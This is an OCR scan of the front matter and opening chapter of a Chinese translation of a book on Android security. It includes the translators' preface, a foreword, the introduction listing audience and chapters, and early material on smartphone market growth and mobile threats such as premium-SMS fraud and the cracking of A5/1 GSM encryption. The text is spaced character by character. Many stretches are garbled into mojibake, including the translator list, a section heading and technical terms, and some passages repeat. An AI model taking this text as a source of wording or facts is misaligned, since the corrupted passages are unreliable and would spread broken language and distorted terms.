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关于 本 书 


本 书 从 安全 问题 和 威胁 
的 角度 ， 对 Android 系 统 平 
台 和 应 用 程序 进行 了 分 析 。 所 
有 对 Android 系 统 安全 或 对 
Android 在 安全 方面 的 优势 
和 劣势 感 兴 趣 的 人 士 ， 都 属于 
本 书 的 读者 群 。 书 中 介绍 了 
Android 操 作 系 统 和 应 用 程序 
的 体系 结构 ， 分 析 了 Android 
系统 平台 提供 的 各 种 安全 特 
性 。 随 后 ， 本 书 又 介绍 了 分 
TRU C AndroidsE&H1m 
用 程序 安全 问题 的 各 种 方法 和 
工具 。 最 后 ， 本 书 还 介绍 了 企 
业 环 境 下 Android 设 备 存 在 
的 各 种 安全 隐患 ， 以 及 增强 
Android 设 备 和 应 用 程序 安全 
性 的 措施 和 步骤 。 尽 管 本 书 主 
要 关注 的 是 Android 系 统 平台 
的 安全 问题 ， 但 是 书 中 论述 的 
很 多 问题 和 原则 ， 同 样 适 用 于 
其 他 主流 的 操作 系统 平台 。 
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本 书 共 分 为 10 Æ, $8 1 章 介绍 了 移动 设备 的 发 展 格局 ; 第 2 章 和 第 3 
章 分 别 介绍 了 Android 操作 系统 和 应 用 程序 的 体系 结构 ; 第 4 章 深 入 研究 了 
Android 系统 的 安全 特性 ; 第 5 ~9 章 介 绍 了 Android 系统 平台 和 Android 应 
程序 安全 问题 的 各 个 方面 ; 第 10 章 展 望 了 未 来 移动 设备 安全 威胁 的 发 展 
格局 。 附 录 A 和 附录 B 分 别 讨论 了 Android 权限 的 风险 等 级 和 JEB 反 编 译 
器 的 用 法 ; 附录 C 演示 了 如 何 破 解 第 7 章 中 的 SecureApp. apk 应 用 程序 ， 
具体 的 破解 方法 和 步骤 ， 可 在 本 书 网 站 (www. androidinsecurity. com) 上 获 
fi; 附录 D 是 本 书 出 现 的 缩 略 语 的 中 英文 对 照 。 

本 书 主要 面向 安全 架构 师 、 系 统管 理 人 员 、 企 业 软 件 开 发 周期 主管 、 
开发 人 员 、 白 帆 黑 客 、 渗 透 测试 人 员 、IT 架构 师 、 首 席 信息 官 、 学 生 和 普 


通用 户 。 


















































































































































E 者 序 


随 着 信息 技术 的 快速 发 展 ， 信 息 已 经 成 为 人 们 日 常生 活 和 工作 中 的 重要 资源 。 
围绕 着 信息 资源 的 安全 问题 逐渐 引起 人 们 的 关注 ， 特 别 是 利用 移动 设备 和 信息 网 络 
发 起 的 各 种 非法 和 犯罪 行为 。 例 如 ， 宅 取 企业 信息 资源 、 商 业 机 密 和 个 人 隐私 、 网 
络 钓 鱼 、 网 络 间谍 刺探 等 恶意 行为 。 而 且 ， 随 着 智能 移动 设备 日 益 普 及 ， 搭 载 各 种 
智能 移动 操作 系统 平台 的 设备 逐渐 进入 人 们 社会 生活 的 各 个 层面 (政府 机 关 、 企 
业 团体 、 家 居 生 活 等 )， 鉴 于 移动 设备 与 生 俱 来 的 安全 短 板 ， 信 息 资源 的 安全 问题 
变 得 更 加 的 复杂 和 严峻 。 

在 当今 众多 的 移动 设备 中 ， 搭 载 Android 系统 的 移动 设备 在 智能 移动 市 场 份额 
上 独 点 鳌头， 几乎 在 每 十 部 搭载 智能 移动 系统 的 设备 中 ， 至 少 就 有 6 部 搭载 
Android 系 统 的 设备 。Android 系统 自 2008 年 10 月 第 一 次 试 水 商用 以 来 ， 经 过 短 短 
的 五 年 时 间 ， 迅 速 发 展 成 全 球 最 为 普及 和 流行 的 、 应 用 程序 最 为 丰富 的 智能 移动 操 
作 系 统 平台 。 据 2013 年 统计 数据 ， 全 球 约 76% 的 移动 设备 和 约 80% 的 智能 手机 ， 
采用 的 都 是 Android 操作 系统 平台 。 除 此 之 外 ，Android 系统 正在 以 迅 独 的 速度 向 
更 加 广泛 的 应 用 领域 扩张 ， 包括 管 能 家 电 、 管 能 汽车 电子 、 企 业 计 算 基础 设施 、 管 
能 定位 导航 终端 、 游 戏 机 ， 甚 至 笔记 本 电脑 等 。Android 系统 如 此 大 的 市 场 占有 量 、 
用 户 普及 度 ， 以 及 如 此 迅猛 的 发 展 势 头 ， 使 得 Android 系统 的 信息 安全 问题 直接 牵 
动 着 移动 设备 信息 资源 领域 的 安全 动向 。 同 传统 的 台式 机 /笔记 本 电脑 系统 相 比 ， 
搭载 Android 系统 平台 的 智能 移动 设备 ， 无 论 在 设备 屏幕 分 闪 能 力 、 安 全 软件 成 熟 
度 ， 还 是 用 户 安全 意识 方面 ， 都 不 及 前 者 。 而 且 ， 如 今 的 智能 移动 设备 发 展 迅 速 ， 
设备 本 身 配 置 各 种 功能 模块 ， 如 GPS, Wi-Fi, NFC, X, DK Wi-Fi Direct 等 ， 
而 这 些 技术 /模块 又 为 恶意 攻击 者 提供 更 多 的 入 侵 设备 的 渠道 。 此 外 ，Android 智能 
移动 设备 完善 、 丰 富 的 功能 ， 使 得 一 部 小 小 的 智能 手机 几乎 可 以 承担 传统 人 台式 机 / 
笔记 本 电脑 处 理 的 大 部 分 个 人 日 常 业 务 ， 如 日 程 安排 计划 、 电 子 邮 件 收发 、 文 档 表 
格 处 理 、 网 上 银行 个 人 支付 、 手 机 银行 、 股 票 理 财 等 账户 操作 管理 、 网 络 账号 登 
录 、 生 活 工作 业务 数据 备份 同步 等 ， 个 人 或 企业 用 户 在 进行 上 述 业 务 操作 时 ， 需 要 
移动 设备 提供 可 靠 的 安全 环境 、 企 业 制定 规范 的 安全 制度 和 用 户 树立 良好 的 安全 意 
识 ， 和 否则 ， 这 些 业 务 中 涉及 的 数据 将 不 可 避免 地 成 为 恶意 攻击 者 山 倪 的 目标 。 

本 书 在 这 一 背景 下 ， 系 统 地 介绍 了 Android 系统 的 体系 结构 、Android 应 用 程 
序 的 组 成 架构 与 运行 机 制 ， 深 入 地 分 析 了 Android 系统 的 安全 机 制 ， 概 述 了 针对 
Android 系统 的 威胁 演化 过 程 与 发 展 格局 。 同 时 ， 结 合 近 期 出 现 的 几 例 Android 7 
洞 与 恶意 软件 ， 系 统 地 总 结 了 Android 系统 的 安全 漏洞 ， 并 对 恶意 软件 的 特点 进行 









































































































































IV Android 系统 安全 与 攻防 














了 深入 的 训 析 。 此 外 ， 本 书 最 大 的 特点 是 从 Android 安全 攻 与 防 的 角度 出 发 ， 基 于 
对 各 种 针对 Android 信息 安全 的 攻击 方式 的 详细 介绍 ， 进 行 深入 地 剖析 ， 并 给 出 应 
对 措施 。 并 且 ， 对 几 种 主要 的 Android 系统 与 应 用 程序 的 分 析 方 法 和 工具 进行 了 详 
细 的 介绍 和 归 类 ， 包 括 渗透 测试 、 逆 向 工程 等 手段 ， 为 Android 设备 的 普通 用 户 、 
移动 应 用 程序 开发 者 、 企 业 安全 分 析 人 员 、 企 业 安全 管理 员 等 人 士 ， 提 供 高 效 的 分 
析 工 具 和 详实 的 测试 指导 。 从 而 ,便于 上 述 人 员 能 够 有 效 地 区 分 恶意 Android 应 
用 、 开 发 安全 的 Android 应 用 程序 、 部 署 可 靠 的 企业 Android 设备 环境 和 制定 完善 、 
健全 的 企业 安全 规章 。 

本 书 主要 由 王 秋 爽 、 郎 为 民 、 王 大 觅 、 其 焰 翻 译 ， 天 津 师范 大 学 的 硕士 研究 生 
张 敬 瑜 ， 解 放 军 国防 信息 学 院 的 张 国 峰 、 陈 红 、 夏 白桦 、 毛 炳 文 、 刘 素 清 、 邹 祥 
m, BEK, REE, KEF, RTF, RRAZ, KMA, ER, RESITA 
WOENE, fugdü. RAR, BKE, AHA, AES, EAR AITAP 
的 全 部 图 表 ， 李 建 军 、 鞭 焰 、 王 逢 东 、 和 孙 月 光 、 和 孙 少 兰 、 马 同 兵 对 本 书 的 初稿 进行 
了 审 校 ， 并 更 正 了 不 少 错误 ， 在 此 一 并 向 他 们 表示 衷心 的 感谢 。 同 时 ， 本 书 是 译 者 
在 尽量 患 实 于 原 书 的 基础 上 翻译 而 成 的 ， 书 中 的 意见 和 观点 并 不 代表 译 者 本 人 及 所 
在 单位 的 意见 和 观点 。 

由 于 译 者 水 平 有 限 ， 翻 译 时 间 仓 促 ， 因 而 本 书 翻译 中 的 错漏 之 处 在 所 难免 ， 奶 
请 各 位 专家 和 读者 不 吝 指 出 。 
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近年 来 针对 移动 设备 的 网 络 威胁 始终 在 不 断 地 增加 。 随 着 Android 系统 逐渐 成 
为 主流 的 移动 设备 系统 平台 ， 与 该 系统 相关 的 安全 问题 也 逐渐 成 为 个 人 和 企业 客户 
关注 的 越 来 越 多 的 问题 。 本 书 对 Android 系统 及 其 功能 特性 的 发 展 过 程 进 行 了 深入 
的 剖析 、 讨 论 了 各 种 针对 Android 设备 的 攻击 方法 ， 为 移动 应 用 程序 开发 人 员 、 安 





全 架构 师 ， 以 及 其 他 各 类 专业 人 员 ， 提 供 了 掌握 移动 设备 安全 威胁 
的 各 类 基础 知识 ， 从 而 使 读者 树立 良好 的 Android 安全 防御 意识 。 














在 当今 世界 移动 设备 大 量 普及 的 背景 下 和 
Misra 开始 关注 Android 系统 的 崛起 和 该 系统 平 























地 熟悉 Android 系统 平台 ， 并 且 在 保护 个 人 和 企业 客户 免 于 章 





防御 手段 所 必需 


移动 设备 的 广泛 领域 中 ，Dubey 和 
人 台所 面临 的 各 种 安全 挑战 。 他 们 超 
越 了 传统 的 被 应 用 程序 开发 者 熟知 和 掌握 的 基本 安全 概念 ， 致 力 于 解决 更 加 重要 
和 高 级 的 安全 课题 。 例 如 ， 攻 击 对 策 、 企 业内 部 Android 系统 整合 ， 以 及 与 之 相 
关 的 企业 监管 与 合 规 风险 。 通 过 本 书 ， 任 何 对 移动 安全 感 兴趣 的 人 
































， 都 可 以 快速 
受 日 益 增 长 的 移动 


设备 安全 威胁 方面 ， 获 得 独特 的 安全 策略 视角 。 这 对 于 安全 架构 师 和 安全 顾问 ， 


以 及 从 事 移 动 设备 与 应 用 程序 的 企业 安全 管 
能 力 。 














卡 内 基 . 梅 隆 大 学 信息 网 络 研究 所 主任 兼 CyLab 网 络 实验 室 教育 、 























她 主管 着 信息 网 络 研究 所 的 研究 生 专业 ， 包 括 
理 专 业 和 信息 技术 专业 。 在 她 的 带领 下 ， 信 息 
各 个 地 区 ， 并 力主 同 卡 内 基 ' 梅 隆 大 学 硅谷 校 
































理 人 员 来 说 ， 是 一 种 必须 具备 的 


培训 、 外 联 主任 





Dena Haritos Tsamitis 博士 
Dena Haritos Tsamitis 博士 领导 的 信息 网 络 研究 所 (Information Networking 
Institute，INI) ， 是 卡 内 基 … 梅 隆 大 学 工程 学 院 的 一 个 全 球 性 的 、 跨 学 科 的 部 门 。 


网 络 研究 所 将 其 专业 


区 合作 ， 将 信息 安全 、 


售 息 网 络 专业 、 信 息 安 全 技术 与 管 
推广 到 了 全 球 


移动 与 软件 











管理 学 科 打 造成 “美国 双 海岸 ” 共 建 专业 。Dena 博士 还 主管 卡 内 基 :| 梅 隆 大 学 








CyLab 网 络 实验 室 的 教育 、 培 训 和 外 联 事务 。 凡 


也 是 NSF (National Science Founda- 

















tion， 国 家 科学 基金 会 ) 资助 的 两 个 信息 安全 教育 项 目 (CyberCorps 奖学金 计 
划 品 和 信息 安全 保障 能 力 构 建 计 划 ) 的 主要 研究 者 ， 同 时 还 是 DOD (Department 











© CyberCorps 奖学金 计划 ， 用 于 资助 实施 “网 络 空间 人 才 ” (CyberCorps ) 计划 ， 鼓励 高 等 院 校 开设 











计算 机 安全 专业 、 开 展 专项 课题 研究 ， 并 为 志愿 从 事 计算 机 安全 工作 相关 专业 的 大 学 生 提 供 奖 学 


金 。 一 一 译 者 注 
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of Defense of the United States， 美 国 国防 部 ) 资助 的 信息 安全 保障 基金 项 目的 主 
要 研究 者 。 她 曾 荣 获 过 2012 年 度 卡 内 基 . 梅 隆 大 学 Barbara Lazarus X, UD € 
其 在 研究 生 和 青年 教师 的 指导 上 所 作出 的 贡献 。 此 外 ， 她 还 被 Alta 联合 公司 和 
CSO 杂志 提名 ， 荣 获 2008 年 度 女性 影响 力 奖 ， 以 表彰 她 在 信息 安全 和 教育 领域 
的 成 就 。 
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2007 年 苹果 公司 推出 iPhone 手机 ， 开 局 了 移动 设备 和 移动 应 用 程序 领域 的 新 
纪元 。 随 后 ，Google 公司 的 Android 系统 平台 也 成 为 移动 设备 市 场 中 的 重要 成 员 ， 
并 且 到 2012 年 ， 搭 载 Android 系统 的 移动 设备 的 出 货 量 首 度 超越 了 苹果 公司 的 
iPhone 手机 。 随 着 移动 设备 逐渐 成 为 主流 ， 针 对 移动 设备 的 威胁 也 在 不 断 地 演化 。 
wA, Android 系统 的 大 量 普及 ， 已 经 引起 了 众多 恶意 攻击 者 的 注意 。 可 以 看 到 ， 
近年 来 针对 Android 系统 平台 的 攻击 案例 数量 正在 不 断 地 攀升 。 


关于 本 书 


本 书 从 安全 问题 和 威胁 的 角度 ， 对 Android 系统 平台 和 应 用 程序 进行 了 分 析 。 
所 有 对 Android 系统 安全 或 对 Android 在 安全 方面 的 优势 和 劣势 感 兴趣 的 人 士 ， 都 
属于 本 书 的 读者 群 。 书 中 介绍 了 Android 操作 系统 和 应 用 程序 的 体系 结构 ， 分 析 了 
Android 系统 平台 提供 的 各 种 安全 特性 。 随 后 ， 本 书 又 介绍 了 分 析 和 测试 Android 
平台 和 应 用 程序 安全 问题 的 各 种 方法 和 工具 。 最 后 ， 本 书 还 介绍 了 企业 环境 下 An- 
droid 设备 存在 的 各 种 安全 隐患 ， 以 及 增强 Android 设备 和 应 用 程序 安全 性 的 措施 和 
步骤 。 尽 管 本 书 主要 关注 的 是 Android 系统 平台 的 安全 问题 ， 但 是 书 中 论述 的 很 多 
问题 和 原则 ， 同 样 适用 于 其 他 主流 的 操作 系统 平台 。 
假设 

本 书 假设 读者 熟悉 操作 系统 的 相关 知识 并 拥有 一 定 的 安全 概念 。 如 果 读 者 掌握 
有 关 渗 透 测 试 、 威 胁 建 模 和 常见 的 Web 应 用 程序 与 浏览 器 漏洞 的 相关 知识 更 好 ， 
不 过 如 果 读 者 没有 掌握 这 些 知 识 ， 在 本 书 的 阅读 上 也 是 没有 问题 的 。 
读者 

本 书 主要 面向 安全 架构 师 、 系 统管 理 人 员 、 企 业 SDLC (Software Development 


Life Cycle， 软 件 开 发 周期 ) 主管 、 开 发 人 员 、 白 帽 黑客 吕 、 渗 透 测 试 人 员 、IT 架 
构 师 、CIO (Chief Information Officer， 首 席 信 息 官 )、 学 生 和 普通 用 户 。 如 果 你 想 











帽 黑客 (white-hat hacker) ， 叉 称 白 帽 匿名 者 、 白 帽子 ， 是 指 利用 黑客 技术 测试 网 络 和 系统 的 性 
能 ， 从 而 判定 它们 能 够 承受 人 侵 的 强 弱 程度 ， 和 网 络 安全 工程 师 的 性 质 有 点 相同 。 通 常 他 们 被 企业 
聘请 来 攻击 他 们 自己 的 系统 或 客户 的 系统 以 便 进行 安全 审查 。 一 一 译 者 注 
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要 了 解 Android 系统 的 安全 特性 、 潜 在 的 安全 攻击 ， 以 及 防御 这 些 攻 击 的 办 法 ， 你 
会 发 现 书 中 的 每 一 章 ， 对 你 来 说 都 可 以 成 为 实用 的 出 发 点 。 我 们 的 目标 是 为 读者 提 
供 充 足 的 信息 和 所 有 Android 平台 的 基础 知识 ， 以 及 背后 相关 的 安全 问题 ， 从 而 使 
读者 能 够 快速 了 解 Android 系统 并 驰 对 于 Android 系统 安全 领域 。 如 果 你 是 一 名 
Android 黑 客 ， 或 者 你 已 经 相当 精通 Android 平台 的 安全 问题 了 ， 那 么 本 书 并 不 适 
合 你 。 


支持 


本 书 的 勘误 表 和 相关 资源 可 从 CRC 出 版 社 的 网 站 ， 以 及 我 们 的 网 站 
www. androidinsecurity. com 上 获得 。 在 我 们 的 网 站 上 ， 有 其 他 用 户 创建 的 应 用 程序 
和 工具 ， 可 以 提供 给 读者 下 载 。 本 书 作 者 编写 的 示例 应 用 程序 ， 可 以 在 我 们 网 站 的 
资源 部 分 获得 。 读 者 可 以 结合 书 中 内 容 ， 使 用 下 述 账 号 和 密码 ， 从 我 们 网 站 上 下 载 
相应 的 apk 文件 进行 练习 。 

用 户 名 : android 

密码 : 1439896461 (本 书 的 10 位 ISBNS ) 


本 书 结 


本 书 共 分 为 10 章 。 第 1 章 介 绍 了 移动 设备 的 发 展 格局 ; 第 2 章 和 第 3 章 分 别 
介绍 了 Android 操作 系统 和 应 用 程序 的 体系 结构 ; 第 4 章 深 入 研究 了 Android 系统 
的 安全 特性 ; 第 5~9 章 介 绍 了 Android 系统 平台 和 Android 应 用 程序 安全 问题 的 各 
个 方面 ; 第 10 章 展望 了 未 来 移动 设备 安全 威胁 的 发 展 格局 。 附 录 A 和 附录 B 分 别 
讨论 了 Android 权限 的 风险 等 级 和 JEB 反 编 译 器 的 用 法 ; 附录 C 演示 了 如 何 破 解 第 
7 章 中 的 SecureApp. apk 应 用 程序 ， 具 体 的 破解 方法 和 步骤 ， 可 在 本 书 网 站 


( www. androidinsecurity. com) 上 获得 。 
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本 章 主要 介绍 当前 移动 设备 的 发 展 格 局 ， 以 及 Android 系统 的 安全 至 关 重 要 的 
原因 。 本 章 先是 从 传统 手机 到 智能 手机 (包括 搭载 Android 系统 的 智能 手机 ) 的 发 
展 过 程 着 手 ， 分 析 了 移动 设备 安全 威胁 的 演化 过 程 。 然 后 ， 将 对 Android 系统 的 历 
史 、 发 布 版 本 以 及 Android 应 用 程序 商店 进行 详细 的 介绍 。 























1.1 选择 Android 系统 的 原因 

















目前 ， 移 动 设备 上 移动 互联 网 用 户 数量 的 增长 极其 迅速 。 从 图 1. 1 的 统计 结果 
中 可 见 ， 在 新 兴 发 达 市 场 中 ， 当 前 移动 设备 的 经 济 占 有 量 仍 处 于 起 步 阶段 ， 但 在 未 
来 的 十 年 里 ， 这 一 占有 量 将 产生 巨大 的 增长 。 
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图 1.1 美国 传统 手机 与 智能 手机 占有 量 对 比 
如 图 1.2 和 图 1.3 所 示 ， 在 所 有 的 智能 手机 中 Android 系统 平台 占有 率 达 到 
64% ， 约 占 总 手机 数量 的 23.5%S。 目 前 ， 智 能 手机 仅 约 占 37% ， 仍 有 超过 60% 
的 巨大 市 场 向 智能 手机 敞开 。 鉴 于 Android 系统 份额 在 智能 手机 市 场 中 已 经 取得 
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了 稳步 的 增长 ， 预 计 在 不 久 的 将 来 ，Android 系统 平台 的 占有 率 仍 将 保持 类 似 的 
增长 。 以 Android 系统 为 引导 ， 在 新 兴 市 场 和 发 达 经 济 市 场 中 ， 智 能 手机 的 占有 
量 将 有 类 似 的 增长 。 即 便 是 在 最 近 的 经 济 低迷 期 ， 智 能 手机 的 用 户 量 仍 保持 着 稳 
步 的 增长 。 预 计 在 不 和 久 的 将 来 ， 移 动 设备 将 超过 服务 器 和 个 人 电脑 成 为 主要 的 互 
联网 接 人 设备 。 
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1.2. EIRE REFORMERA UG RO 


在 那 时 ， 智 能 手机 还 不 是 必需 品 ， 反 而 仅仅 被 认为 是 技术 发 伐 友 的 小 玩具 。1996 
年 ， 出 现 了 第 一 部 搭载 Windows CE 系统 的 手持 设备 。 然 而 ， 直 到 2000 年 移动 智能 手机 
才 真正 走 进 人 们 的 生活 ， 那 一 年 爱立信 公司 发 布 了 一 款 搭载 诺基亚 Symbian 操作 系统 的 
智能 手机 一 一 爱立信 R380。 那 段 时 间 ， 手 机 和 PDA (Portable Digital Assistant， 个 人 数 
字 助 理 ) 还 是 彼此 分 离 的 设备 (不 知 大 家 是 否 还 记得 iPaq?) 。 

2002 年 ， 微 软 和 RIM 公司 分 别 发 布 了 搭载 Windows CE 和 Blackberry (R) 
操作 系统 的 智能 手机 。 尽 管 在 Blackberry 系统 的 智能 手机 发 布 之 后 ， 两 大 公司 的 智 
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1.3 ”全 球 智能 手机 一 季度 销售 量 〇 


能 手机 加 起 来 在 手机 市 场 占有 了 一 定 的 份额 ,但 智能 手机 真正 地 走 进 并 占有 终端 手 
机 用 户 市 场 则 是 出 现在 2007 年 苹果 公司 推出 的 第 一 款 iPhone 智能 手机 之 后 。 那 
时 ，RIM 公司 还 占有 着 多 数 的 智能 手机 市 场 份额 。 不 过 ， 也 就 是 大 约 在 那个 时 
候 ，Google 公司 决定 涉足 移动 设备 市 场 。 未 来 移动 设备 将 被 用 来 承载 用 户 的 大 部 
分 活动 ， 也 就 意味 着 用 户 将 会 使 用 它们 进行 上 网 搜索 ， 而 这 也 正 是 Google 公司 
所 提供 的 核心 服务 项 目 。 随 着 可 以 在 移动 设备 上 投放 更 多 具有 针对 性 的 广告 ， 广 
告 收 入 也 将 更 加 倚重 于 移动 设备 。 在 台式 机 或 笔记 本 上 搜索 “比萨 饼 ” 时 ， 
Google 公司 只 能 通过 设备 的 IP 地 址 获得 用 户 的 位 置信 息 和 其 他 信息 。 然 而 ， 在 
移动 电话 上 ，Google 公司 就 能 够 利用 手机 GPS 提供 的 位 置信 息 向 用 户 推送 在 其 
身边 的 “相关 广告 ”。 

2007 年 ， 开 放手 机 联盟 (Open Handset Alliance, OHA) 首次 亮相 ，2008 年 
Google 公司 对 外 发 布 了 首 款 商用 Android 操作 系统 。 

如 图 1.4 所 示 ， 移 动 设备 的 计算 能 力 成 倍增 长 。HTC EVO 4G 手机 配备 了 
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1GHz 主 频 的 高 通 8650 处 理 器 、1GB ROM (Read-Only Memory， 只 读 存 储 器 ， 用 于 
存储 系统 软件 ) 和 512MB RAM (Random Access Memory， 随 机 存 取 存 储 器 ) 。 同 
时 ,该 手机 还 配备 了 802.11b/g Wi- 下 、 蓝 牙 功 能 、800 万 像素 照相 机 、GPS 
(Global Positioning System ， 全 球 定 位 系统 ) 功能 和 HDMI (High Definition Multime- 
dia Interface， 高 清晰 度 多 媒体 接口 ) 。 这 款 手机 的 配置 足以 超过 几 年 前 的 主流 台式 
机 的 配置 ， 而 且 这 种 追求 高 配 的 趋势 很 可 能 仍 将 继续 下 去 。 
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图 1.4 iPhone, DroidX 和 一 台 老 式 台式 机 的 配置 比较 
从 图 1.5 中 可 以 看 到 ，Android 系统 的 市 场 份 额 一 直 保 持 稳定 的 增长 速度 。 
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2011 Æ, Android 设备 销售 量 首 次 超过 了 iPhone, MAR 1.6 中 可 以 看 到 ， 到 2011 年 
中 期 为 止 ， 每 天 约 有 SO 万 部 Android 设备 被 激活 。 图 1.7 显示 的 是 已 经 转向 
Android 系 统 的 运营 商 和 制造 商 的 数量 。 














1.6 Android 设备 日 激活 量 (2011 年 1 月 ~12 H) 
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图 1.7 主流 运营 商 的 Android 设备 


iPad 推出 之 后 ， 很 多 制造 商 将 Android 系统 作为 其 产品 的 操作 系统 平台 。 三 星 
Galaxy Tab 就 是 一 个 完美 的 例子 。 其 他 厂商 (如 戴尔 、 东 芝 等 ) 也 已 经 开始 扒 出 搭 
载 Android 系统 的 平板 电脑 ， 如 图 1.8 所 示 。 在 平板 电脑 的 市 场 中 ，Android 和 i08 
作为 两 大 主流 操作 系统 平台 并 存 的 趋势 很 有 可 能 仍 将 持续 下 去 
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设备 制造 商 Android 设 备 类 型 
RE 平板 电脑 

华硕 平板 电脑 

戴尔 手机 和 平板 电脑 
HTC 手机 和 平板 电脑 
LG 手机 

三 平板 电脑 和 手机 
摩托 罗拉 平板 电脑 和 手机 
东芝 平板 电脑 


图 1.8 主流 厂商 的 Android 设备 





1.2 移动 设备 的 威胁 演化 


随 着 移动 设备 从 传统 电话 发 展 到 智能 手机 ， 针 对 移动 设备 的 威胁 也 与 之 同时 演 
化 。 同 过 去 传统 手机 相 比 ， 智 能 手机 具有 更 大 的 被 攻击 面 。 而 且 ， 智 能 设备 早已 突 
破 了 传统 的 使 用 方式 ， 传 统 手 机 主要 用 来 打 电 话 和 发 短信 。 如 今 ， 智 能 手机 几乎 可 
以 用 来 完成 人 们 在 电脑 上 想 做 的 任何 事情 ， 如 进行 日 常 的 银行 交易 、 登 录 Facebook 
社交 平台 、 导 航 、 维 护 健康 ， 以 及 锻炼 记录 等 。 

曾经 很 长 的 一 段 时 间 ， 诺 基 亚 的 Symbian 操作 系统 一 直 是 主要 的 威胁 攻击 日 
标 。 然 而 ， 由 于 Symbian 系统 的 市 场 份 额 持续 下 滑 ，Android 设备 和 iPhone 的 市 场 
占有 量 持续 增长 。 目 前 ， 攻 击 者 已 经 开始 转向 攻击 这 些 新 兴 的 系统 平台 。 

在 美国 以 外 的 其 他 国家 里 ，Symbian 仍然 是 主流 的 手机 系统 平台 。 因 此 ， 在 未 来 的 
一 段 时 间 ， 该 系统 仍 将 是 被 攻击 的 目标 。 不 过 ， 随 着 针对 Android 和 iPhone 设备 的 攻击 
事件 不 断 地 增多 ， 攻 击 的 方式 和 手段 也 更 趋 于 复杂 。 可 见 ， 黑 客 们 更 青睐 于 流行 的 系统 
平台 ， 随 着 Android 系统 的 日 益 流行 ， 针 对 该 系统 的 安全 威胁 数量 也 将 随 之 持续 增长 。 

从 Android 设备 的 威胁 格局 上 来 看 ， 过 往 的 这 两 三 年 里 ， 针 对 Android 的 用 户 
和 应 用 程序 的 攻击 数量 已 经 大 幅 地 增长 。 随 着 Android 系统 市 场 占 有 率 的 增长 ， 攻 
击 者 已 经 把 攻击 目标 转向 了 该 系统 和 它 的 用 户 ，Android 系统 上 的 恶意 软件 的 数量 
也 随 之 呈 上 升 趋势 。 

这 一 增长 趋势 并 不 局 限于 Android 设备 的 占有 量 ， 移 动 电话 的 功能 也 随 之 越 来 
越 丰富 ， 不过， 由 此 产生 的 攻击 面 也 越 来 越 大 。 如 今 ， 在 一 部 典型 的 智能 手机 上 所 
能 获取 的 数据 类 型 和 所 能 做 的 事情 都 远 远 不 同 于 几 年 以 前 。 

针对 传统 手机 的 攻击 目标 主要 在 于 短信 、 手 机 号 码 和 设备 上 有 限 数据 的 获取 
上 。 典 型 的 案例 比如 ， 针 对 增值 短信 服务 的 攻击 。 攻 击 者 操控 用 户 手 机 向 付费 服务 
号 码 发 送 短信 或 拨打 电话 ， 让 用 户 损 失 话 费 。 和 这 些 攻击 不 一 样 的 是 ，Android 或 
其 他 智能 手机 上 的 攻击 则 更 具有 复杂 性 。 例 如 ， 亚 意 软 件 会 获取 用 户 的 敏感 信息 
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(如 个 人 资料 、 银 行 信息 、 聊 天 记录 )， 然 后 将 它们 发 送 给 潜在 的 攻击 者 。 可 见 ， 
智能 手机 饱 受 大 量 针 对 敏感 信息 的 恶意 软件 的 影响 和 攻击 。 

如 下 是 一 部 典型 的 智能 手机 上 的 数据 样 例 : 

1) 企业 和 个 人 的 电子 邮件 。 

2) 通讯 录 (以 及 他 们 的 电子 邮件 地 址 和 个 人 地 址 ) 。 

3) 银行 信息 。 

4) 通讯 记录 。 

5) 图 片 。 

6) 视频 。 

7) 信用 卡 信息 。 

8) 位 置 和 GPS 数据 。 

9) 健康 信息 。 

10) 日 程 安排 信息 。 

针对 搭载 Android 系统 平台 手机 的 攻击 可 能 导致 上 述 资料 的 泄露 ， 一 些 可 能 的 攻击 
造成 的 危害 性 甚至 更 大 ， 比 如 像 社 会 工程 学 9 、 网 络 钓鱼 、 电 子 诈 骗 、 间 谍 软 件 和 恶意 
软件 等 。 例 如 ， 手 机 上 的 某 个 应 用 软件 为 用 户 订阅 了 一 项 付费 服务 ， 用户 除了 需要 支付 
订阅 费 之 外 ， 还 要 承担 额外 的 流量 费 和 使 用 费 。 相 比 于 台式 电脑 ， 智 能 手机 上 的 浏览 攻 
是 一 种 精简 版 的 浏览 需 ， 这 就 导致 了 智能 手机 操作 系统 和 浏览 需 上 的 加 密 功 能 会 受到 很 
大 的 限制 ， 并 且 需 要 消耗 更 多 的 处 理 时 间 。 例 如 ， 从 移动 浏览 器 上 删除 证 书 的 操作 。 
直到 现在 ， 人 们 所 关注 的 攻击 还 大 多 停留 在 网 络 通信 的 应 用 和 协议 方面 ， 另 一 
类 攻击 则 是 针对 蜂 帘 技 术 本 身 进行 的 。GSM (Global System for Mobile Communication , 
全 球 移动 通信 系统 ) 和 CDMA (Code Division Multiple Access, WALH) 是 目前 
世界 上 应 用 最 广泛 的 通信 标准 ,运营 商 使 用 这 些 标准 提供 各 种 移动 电话 服务 ( 例 
如 ， 电 话 呼叫 和 短信 等 ) 。 随 着 移动 设备 的 增加 ， 这 些 标准 已 经 得 到 了 包括 研究 人 
员 和 恶意 攻击 者 在 内 的 各 种 人 员 越 来 越 多 的 关注 。 

世界 上 多 数 的 蜂 窒 移 动 电话 采用 GSM 通信 标准 ， 该 标准 覆盖 了 200 多 个 国家 ， 
拥有 40 多 亿 用 户 。GSM 标准 采用 A5/1 加 密 技 术 提 供 无 线 通信 隐私 保护 功能 (ln 
加 密 短 信和 呼叫 通话 ) 。 起 初 ， 该 加 密 技术 能 够 奏效 ， 不 过 有 人 通过 逆向 工程 的 方 
式 破解 了 该 技术 ， 其 中 的 一 些 细节 被 泄露 公开 。20 世纪 90 年 代 初 ， 在 一 些 学 术 机 
构 以 及 相关 的 研究 论文 上 就 已 经 有 了 关于 A5/1 加 密 技 术 破解 过 程 的 介绍 。 到 2009 
年 ， 研 究 人 员 Karsten Nohl 通过 一 个 攻击 演示 了 如 何 获 取 AS/1 加 密 密 钥 ， 而 进行 
这 项 工作 甚至 只 需要 相当 便宜 的 设备 就 能 完成 。A5/1 加 密 技 术 采 用 64 MRH, 






















































































”社会 工程 学 ， 指 的 是 利用 大 众 玖 于 防范 ， 通 过 人 际 间 的 互动 ， 以 交谈 、 欺 骗 、 假 冒 等 方式 取得 用 户 
的 个 人 资料 ， 如 网 站 、 电 子 邮 件 、 网 上 银行 账号 、 密 码 、 信 用 卡 资料 等 。 一 一 译 者 注 


























8 Android 系统 安全 与 攻防 





如 今 使 用 硬件 设备 就 能 实施 攻击 。 已 知 一 条 消息 的 明文 和 密 文 ， 就 能 在 一 个 预先 计 
